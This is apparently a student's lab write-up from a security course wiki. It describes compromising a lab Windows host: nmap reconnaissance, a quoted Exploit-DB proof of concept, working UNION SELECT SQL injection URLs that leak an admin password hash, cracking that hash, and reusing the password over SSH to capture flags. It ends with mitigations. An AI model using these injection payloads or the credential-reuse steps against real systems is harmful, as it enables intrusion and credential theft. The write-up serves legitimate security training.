Lab 9.2 ‐ Exploiting Gloin ‐ JM - Jacob-Mayotte/SEC335_Tech_Journal GitHub Wiki

Target: gloin.shire.org

Target IP: 10.0.5.31

To retrieve the IP address associated with gloin.shire.org I utilize: sudo nslookup gloin.shire.org 10.0.5.22

image

IP Address of the machine is: 10.0.5.31

Open Ports:

Initially I used: sudo nmap 10.0.5.31 to just see what information a default scan would expose:

image

Knowing that there were open ports I proceeded with a service/version/tracerte/script detection scan: sudo nmap 10.0.5.31 -A the scan provided:

image

Info summarized:

Open Port State Service Version
22/tcp open ssh OpenSSH for_windows_7.7 (protocol 2.0)
443/tcp open https Apache httpd 2.4.51 ((Win64) OpenSSL/1.1.1l PHP/7.3.31
3389/tcp open ms-wbt-server Microsoft Terminal Services

Discovered Vulnerability:

The Nmap scans exposed that the machine is running SSH, HTTPS, and RDP. The scan had a 92% positive guess towards the OS of the machine being Windows. Now I had somewhere to start looking for vulnerabilities, but before doing that since I knew https was enabled I wanted to see if I was able to access 10.0.5.31, which brought me to a very basic, online Entrance Exam page:

image

It seems that a user can enter a "Reference Code" to take an exam. I really was unsure of where to proceed from here so I decided to use my good ol' friend, Google. I searched: online entrance exam reference code exploit

And found:

image

I explored the top link: https://www.exploit-db.com/exploits/50398 and was greeted with very useful information:

# Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Multiple SQL injections

The following PoCs will leak the admin username and password:

Unauthenticated:
    http://127.0.0.1/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;

Admin:
    http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;

**SOURCE: ** https://www.exploit-db.com/exploits/50398 author: Amine ismail @aminei_

As the exploit said there are multiple SQL injections possible, so I tried each via the url field:

Unauthenticated:

https://10.0.5.31/entrance_exam//take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;

Which was extremely exciting because I was greeted with the following:

image

Admin:

https://10.0.5.31/entrance_exam//admin/view_enrollee.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;

image

How you achieved a foothold:

From this SQLi that I ran: https://10.0.5.31/entrance_exam//admin/view_enrollee.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list; it became clear to me that the email listed: 4214db3884e9cd913b49b5b44e49ae96 wasn't really an email. Then the other SQLi provided me with the same string. I believe that it is a hash value hiding a valuable password.

I used crackstation.net and was provided with:

image

Hash Type Result
4214db3884e9cd913b49b5b44e49ae96 Md5 Moria2Featon6

See Reflection because I ran into a hiccup here.

Established foothold:

image

Now I knew I could enter the website with those credentials, but why not the actual system? I did a bit of researching and was able to find out that adminis not the username of an administrator account on Windows (I knew this was Windows or a strong feeling because of the earlier scans + RDP being open). So I returned to the command line and retried SSH:

image

How you achieved root/Administrative level compromise:

Using the cmd line and ssh:

image

image

User Flag: 3eb419b6-813d-4fcf-995e-b0b960c83457

To find the user flag I had to run:

ls C:\Users\ // trying to find a named Gloin user account

image

I noticed Gloin was there so I switched into their directory and run an ls and found the userflag.txt file:

image

Root Flag: a7ce6b81-8c2b-4b67-931b-838d6e88cd95

Once ssh'd into the box I was able to just run ls from admin level and retrieve the root flag:

image

How might the vulnerabilities be mitigated by the systems administrator and developer?

  • Stop reusing passwords.

Please stop. Especially between admin based accounts (the website and the system). THe org should implement a password manager to assist in avoiding the reuse of passwords. The PW Manager will allow these dinguses to create complex passwords without worrying about forgetting them

  • Utilize Prepared Statements

Since this website is using SQL databases, the developer should have implement prepared statement with parameterized queries. This means that a dev has to define SQL code and pass parameters to the query in the ladder. This prevents users to change query intentions no matter if SQLi commands are being used!

Reflection:

  • Problems faced:

I was a bit stumped on where to go with the information I had gathered: admin, and Moria2Featon6, so I just kept trying different things but could not find a foothold.

I tried SSH first, but then kept getting denied entry. I thought I had valuable creds or values so I kept searching for a different entry point. I returned to my exploitdb resource that I had found and reviewed the different file paths being used in the sqli attacks and noticed:

Admin:
    http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;

/admin I decided to mess with the url and fortunately found this login page:

image

Then I was able to login:

image

This lab was really fun because I felt like I was using a culmination of knowledge learned from the last few weeks in this course and even others. I had a moment of scratching my head, which I described above but as always google never hurts. In the future I think I will try and start by gathering as much information relevant to the host that I can. Yes I found the open ports, etc, but I should have used google much earlier on the website name to try and find the exploit I ended up using. I think this is a valuable learning lesson though, conduct as much OSINT as possible before getting to ahead of yourself. Ultimately though this was really informative and connected a few dots in regard to the attacking process.